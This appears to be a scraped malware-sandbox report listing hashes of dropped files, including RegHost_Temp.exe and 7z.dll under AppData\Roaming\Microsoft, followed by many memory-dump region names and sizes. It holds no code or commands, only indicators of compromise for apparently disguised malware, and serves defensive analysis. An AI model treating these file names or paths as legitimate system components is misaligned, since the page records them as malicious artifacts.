133408c310ac19c29168c30b28fe96427e7a4d69fddb4de31c27430af05e318098e6fcb1fd6ca34efabdd7ba70d85acff93cac9351fd82a6a84f651274fb5faa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.exe
MD5
04ed50252c84264e20272d8eecbb5dfe

SHA1
dd8513a583de10c6d69f731dafe47134367ba4b0

SHA256
d8408a8cc89f9dfef7c994a822409f6bcb2dc6d8fe9af0edeb81c5347411641c

SHA512
536d148dde8feac142ca3b4a316ec3ecd76038c19d346d67cba9ae193722cd5aad890004e80fb37a56f14ff6aba25fed0f15f3845e5ce7fdbdb36612690e5f71

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.exe
MD5
22906e3816bd6e82510d22c196c4d843

SHA1
32711e13e4427604f4ec4b9606f14aa2611d82f0

SHA256
f785ceedf6bf4da13644cb5dce95d0745e120f4f395d139e3044d6b8a4ea8283

SHA512
4c17d94de3cb6b53835feff64d478dcca04a9cd409f7faaa6c491efc1f218554c10d95349896bd051c86acf255b0bc00f2ceeb19f2336663b7ecde8dcbed9e28

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip
MD5
b58884e0aed5e1591fa72febf6dc8d47

SHA1
853e404cad2e662604497d7313ca8aa36cf4e9e1

SHA256
a9f1b987d3b1fb46c6d9ede15027f23c822967b699ce20b01f077faf6fa3e5d4

SHA512
20177c63929049ca80e8e7730858b7f33f3ee3fb76014e5e0c66ccc318747c1f434f77e1811775e13bd8d26e1a847a85cc7b09dce471525ab882da543a9dfe5c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip
MD5
b58884e0aed5e1591fa72febf6dc8d47

SHA1
853e404cad2e662604497d7313ca8aa36cf4e9e1

SHA256
a9f1b987d3b1fb46c6d9ede15027f23c822967b699ce20b01f077faf6fa3e5d4

SHA512
20177c63929049ca80e8e7730858b7f33f3ee3fb76014e5e0c66ccc318747c1f434f77e1811775e13bd8d26e1a847a85cc7b09dce471525ab882da543a9dfe5c

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
memory/1012-119-0x0000000000000000-mapping.dmp

Download
memory/1176-120-0x0000000000000000-mapping.dmp

Download
memory/1212-127-0x0000000000000000-mapping.dmp

Download
memory/1260-195-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1260-183-0x0000000140913BEA-mapping.dmp

Download
memory/1260-188-0x000001E39CAE0000-0x000001E39CAE2000-memory.dmp

Filesize
8KB

Download
memory/1260-190-0x000001E39CAE0000-0x000001E39CAE2000-memory.dmp

Filesize
8KB

Download
memory/1260-191-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1260-197-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1664-139-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1664-135-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1664-155-0x0000000000C80000-0x0000000000C82000-memory.dmp

Filesize
8KB

Download
memory/1664-136-0x000000014011F187-mapping.dmp

Download
memory/1664-137-0x0000000000C80000-0x0000000000C82000-memory.dmp

Filesize
8KB

Download
memory/1664-140-0x0000000000C80000-0x0000000000C82000-memory.dmp

Filesize
8KB

Download
memory/1664-144-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1664-153-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1664-145-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1664-147-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1664-148-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1664-152-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1664-150-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1728-170-0x0000000000000000-mapping.dmp

Download
memory/1944-160-0x0000000000000000-mapping.dmp

Download
memory/2376-171-0x0000000000000000-mapping.dmp

Download
memory/2452-162-0x0000000000000000-mapping.dmp

Download
memory/2584-177-0x0000000000000000-mapping.dmp

Download
memory/2648-157-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/2648-141-0x000002B9B2700000-0x000002B9B2702000-memory.dmp

Filesize
8KB

Download
memory/2648-151-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/2648-146-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/2648-142-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/2648-132-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/2648-143-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/2648-156-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/2648-158-0x000002B9B2700000-0x000002B9B2702000-memory.dmp

Filesize
8KB

Download
memory/2648-154-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/2648-138-0x000002B9B2700000-0x000002B9B2702000-memory.dmp

Filesize
8KB

Download
memory/2648-149-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/2648-133-0x0000000140913BEA-mapping.dmp

Download
memory/2884-121-0x0000000000000000-mapping.dmp

Download
memory/3328-126-0x0000000000000000-mapping.dmp

Download
memory/3596-176-0x0000000000000000-mapping.dmp

Download
memory/3744-118-0x0000000000000000-mapping.dmp

Download
memory/3776-163-0x0000000000000000-mapping.dmp

Download
memory/3824-186-0x000000014011F187-mapping.dmp

Download
memory/3824-193-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/3824-192-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/3824-194-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/3824-189-0x00000000001F0000-0x00000000001F2000-memory.dmp

Filesize
8KB

Download
memory/3824-196-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/3824-198-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/3824-187-0x00000000001F0000-0x00000000001F2000-memory.dmp

Filesize
8KB

Download
memory/3824-199-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download